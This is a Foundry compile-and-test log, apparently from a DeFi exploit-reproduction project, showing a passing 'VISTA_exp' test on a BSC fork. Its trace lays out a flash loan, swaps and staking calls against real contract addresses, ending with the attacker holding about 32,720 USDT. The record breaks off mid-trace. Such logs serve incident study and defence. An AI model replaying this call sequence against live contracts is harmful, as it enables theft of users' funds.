Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.30s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-10/VISTA_exp.sol:65:25:
   |
65 |         (bool success3, bytes memory data) =
   |                         ^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
  --> src/test/2024-10/VISTA_exp.sol:63:9:
   |
63 |         bytes calldata data
   |         ^^^^^^^^^^^^^^^^^^^

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-10/VISTA_exp.sol:13:5:
   |
13 |     IWBNB WBNB = IWBNB(payable(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c));
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-10/VISTA_exp.sol:19:5:
   |
19 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2072): Unused local variable.
  --> src/test/2024-10/VISTA_exp.sol:46:10:
   |
46 |         (bool success,) = presale.call(
   |          ^^^^^^^^^^^^

Warning (2072): Unused local variable.
  --> src/test/2024-10/VISTA_exp.sol:52:10:
   |
52 |         (bool success1,) = VISTA.call(
   |          ^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-10/VISTA_exp.sol:59:9:
   |
59 |         address initiator,
   |         ^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-10/VISTA_exp.sol:60:9:
   |
60 |         address token,
   |         ^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-10/VISTA_exp.sol:61:9:
   |
61 |         uint256 amount,
   |         ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-10/VISTA_exp.sol:62:9:
   |
62 |         uint256 fee,
   |         ^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-10/VISTA_exp.sol:63:9:
   |
63 |         bytes calldata data
   |         ^^^^^^^^^^^^^^^^^^^

Warning (2072): Unused local variable.
  --> src/test/2024-10/VISTA_exp.sol:65:10:
   |
65 |         (bool success3, bytes memory data) =
   |          ^^^^^^^^^^^^^

Warning (2072): Unused local variable.
  --> src/test/2024-10/VISTA_exp.sol:69:10:
   |
69 |         (bool success,) = sale.call(
   |          ^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 780.58ms (1.78ms CPU time)

Ran 1 test for src/test/2024-10/VISTA_exp.sol:ContractTest
[PASS] testExploit() (gas: 1500987)
Logs:
  [Begin] Attacker USDT before exploit: 0.000000000000000000
  pancakeV3FlashCallback
  1497670995370650826777
  1497000000000000000000
  [End] Attacker USDT after exploit: 32720.669999999999999999

Traces:
  [274533] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 43305237 [4.33e7])
    │   └─ ← [Return] 0
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::accesses(0x55d398326f99059fF775485246999027B3197955)
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000017058b35e777da275)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: 0x55d398326f99059fF775485246999027B3197955, fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [1588987] ContractTest::testExploit()
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker USDT before exploit", val: 0, decimals: 18)
    ├─ [1545918] 0x36696169C63e42cd08ce11f5deeBbCeBae652050::flash(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1500000000000000000000 [1.5e21], 0, 0x)
    │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x36696169C63e42cd08ce11f5deeBbCeBae652050) [staticcall]
    │   │   └─ ← [Return] 43430185169243476963546422 [4.343e25]
    │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x36696169C63e42cd08ce11f5deeBbCeBae652050) [staticcall]
    │   │   └─ ← [Return] 13108618541737229100893 [1.31e22]
    │   ├─ [25971] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1500000000000000000000 [1.5e21])
    │   │   ├─ emit Transfer(from: 0x36696169C63e42cd08ce11f5deeBbCeBae652050, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1500000000000000000000 [1.5e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x4b4dfb61299ca62a744d1ae05c6e24e84740e94efd86eec09992191d35df35c4: 0x00000000000000000000000000000000000000000023ecb30e3b9c259ffad536 → 0x00000000000000000000000000000000000000000023ec61bd8d177cd20ad536
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000005150ae84a8cdf00000
    │   │   └─ ← [Return] true
    │   ├─ [1484051] ContractTest::pancakeV3FlashCallback(750000000000000000 [7.5e17], 0, 0x)
    │   │   ├─ [0] console::log("pancakeV3FlashCallback") [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 1500000000000000000000 [1.5e21]
    │   │   ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 1500000000000000000000 [1.5e21])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 1500000000000000000000 [1.5e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0x00000000000000000000000000000000000000000000005150ae84a8cdf00000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [91807] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(1500000000000000000000 [1.5e21], 0, [0x55d398326f99059fF775485246999027B3197955, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1729495645 [1.729e9])
    │   │   │   ├─ [10834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, 1500000000000000000000 [1.5e21])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, value: 1500000000000000000000 [1.5e21])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0x00000000000000000000000000000000000000000000005150ae84a8cdf00000 → 0
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000005150ae84a8cdf00000 → 0
    │   │   │   │   │   @ 0x86163c67671b041a0570f826e28048defbd2664533c4d000d0b8bc65e886d6c5: 0x00000000000000000000000000000000000000000002334b52ae611e26a1e39c → 0x00000000000000000000000000000000000000000002339ca35ce5c6f491e39c
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2893] 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 2660081793467277654483868 [2.66e24], 2664105756134541070728206 [2.664e24], 1729495642 [1.729e9]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00) [staticcall]
    │   │   │   │   └─ ← [Return] 2661581793467277654483868 [2.661e24]
    │   │   │   ├─ [62345] 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00::swap(0, 1497670995370650826777 [1.497e21], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [27971] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1497670995370650826777 [1.497e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1497670995370650826777 [1.497e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x86163c67671b041a0570f826e28048defbd2664533c4d000d0b8bc65e886d6c5: 0x000000000000000000000000000000000000000000023425766197203bf07c0e → 0x0000000000000000000000000000000000000000000233d446055bd65a9983f5
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000051305c3b49e156f819
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2661581793467277654483868 [2.661e24]
    │   │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2662608085139170419901429 [2.662e24]
    │   │   │   │   ├─ emit Sync(reserve0: 2661581793467277654483868 [2.661e24], reserve1: 2662608085139170419901429 [2.662e24])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 1500000000000000000000 [1.5e21], amount1In: 0, amount0Out: 0, amount1Out: 1497670995370650826777 [1.497e21], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 9: 0x0000000000000000000000000000069251e33960d3f26742d6b668d0ec4ca335 → 0x0000000000000000000000000000069251e63a8a3db54976263a5c8b1bc54b4b
    │   │   │   │   │   @ 8: 0x6716025a000000023425766197203bf07c0e00000002334b52ae611e26a1e39c → 0x6716025d0000000233d446055bd65a9983f500000002339ca35ce5c6f491e39c
    │   │   │   │   │   @ 10: 0x000000000000000000000000000006940ba6f04fff387e4603acec548820727e → 0x000000000000000000000000000006940ba9ef270875ee681242bc65ed78fd25
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 1497670995370650826777 [1.497e21]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 1497670995370650826777 [1.497e21]
    │   │   ├─ [0] console::log(1497670995370650826777 [1.497e21]) [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 1497670995370650826777 [1.497e21]
    │   │   ├─ [24562] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::approve(0x7C98b0cEEaFCf5b5B30871362035f728955b328c, 1497670995370650826777 [1.497e21])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7C98b0cEEaFCf5b5B30871362035f728955b328c, value: 1497670995370650826777 [1.497e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x142b3a79d7051f6cf5d22b3faba33688b2d988f09ea05564d4c77a9677b8c930: 0 → 0x000000000000000000000000000000000000000000000051305c3b49e156f819
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 1497670995370650826777 [1.497e21]
    │   │   ├─ [1083885] 0x7C98b0cEEaFCf5b5B30871362035f728955b328c::stake(1497, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   └─ ← [Return] 1497670995370650826777 [1.497e21]
    │   │   │   ├─ [638] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::allowance(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x7C98b0cEEaFCf5b5B30871362035f728955b328c)
    │   │   │   │   └─ ← [Return] 1497670995370650826777 [1.497e21]
    │   │   │   ├─ [27934] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x7C98b0cEEaFCf5b5B30871362035f728955b328c, 1497000000000000000000 [1.497e21])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x7C98b0cEEaFCf5b5B30871362035f728955b328c, value: 1497000000000000000000 [1.497e21])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7C98b0cEEaFCf5b5B30871362035f728955b328c, value: 670995370650826777 [6.709e17])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x142b3a79d7051f6cf5d22b3faba33688b2d988f09ea05564d4c77a9677b8c930: 0x000000000000000000000000000000000000000000000051305c3b49e156f819 → 0x000000000000000000000000000000000000000000000000094fdabc0992f819
    │   │   │   │   │   @ 0x72077acb272725ed73830bf5c0102abe2d0dec840762059fc1188b0af381015b: 0 → 0x000000000000000000000000000000000000000000000051270c608dd7c40000
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000051305c3b49e156f819 → 0x000000000000000000000000000000000000000000000000094fdabc0992f819
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [8071] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(0x3a923ae336112bcADA95d1A44393f16C51A68C33, 1422150000000000000000 [1.422e21])
    │   │   │   │   ├─ emit Transfer(from: 0x7C98b0cEEaFCf5b5B30871362035f728955b328c, to: 0x3a923ae336112bcADA95d1A44393f16C51A68C33, value: 1422150000000000000000 [1.422e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xefc9a3523dab9abc56dc88806b4a7faa979322c51c3d06e93e3a07c64cb972c9: 0x000000000000000000000000000000000000000000000001f184c90efdc10000 → 0x00000000000000000000000000000000000000000000004f09d08b2f57880000
    │   │   │   │   │   @ 0x72077acb272725ed73830bf5c0102abe2d0dec840762059fc1188b0af381015b: 0x000000000000000000000000000000000000000000000051270c608dd7c40000 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [3271] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19])
    │   │   │   │   ├─ emit Transfer(from: 0x7C98b0cEEaFCf5b5B30871362035f728955b328c, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 74850000000000000000 [7.485e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x72077acb272725ed73830bf5c0102abe2d0dec840762059fc1188b0af381015b: 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000 → 0
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000094fdabc0992f819 → 0x00000000000000000000000000000000000000000000000418107929878ff819
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [37107] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1497000000000000000000 [1.497e21])
    │   │   │   │   ├─ emit Transfer(from: 0x7C98b0cEEaFCf5b5B30871362035f728955b328c, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1497000000000000000000 [1.497e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x144fd267acae78d11395ae2ddcdcd2ba3237608801c65c81999b993438c6c92a: 0x000000000000000000000000000000000000000000000248fb354ed4e83c0000 → 0x0000000000000000000000000000000000000000000001f7d428ee4710780000
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000000051270c608dd7c40000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [71278] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 2592000 [2.592e6])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1732087645 [1.732e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d8c: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d8d: 0 → 0x00000000000000000000000000000000000000000000000000000000673d8f5d
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 0 → 1
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 5184000 [5.184e6])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1734679645 [1.734e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 1 → 2
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d8f: 0 → 0x0000000000000000000000000000000000000000000000000000000067651c5d
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d8e: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 7776000 [7.776e6])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1737271645 [1.737e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 2 → 3
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d90: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d91: 0 → 0x00000000000000000000000000000000000000000000000000000000678ca95d
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 10368000 [1.036e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1739863645 [1.739e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d93: 0 → 0x0000000000000000000000000000000000000000000000000000000067b4365d
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 3 → 4
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d92: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 12960000 [1.296e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1742455645 [1.742e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 4 → 5
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d95: 0 → 0x0000000000000000000000000000000000000000000000000000000067dbc35d
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d94: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
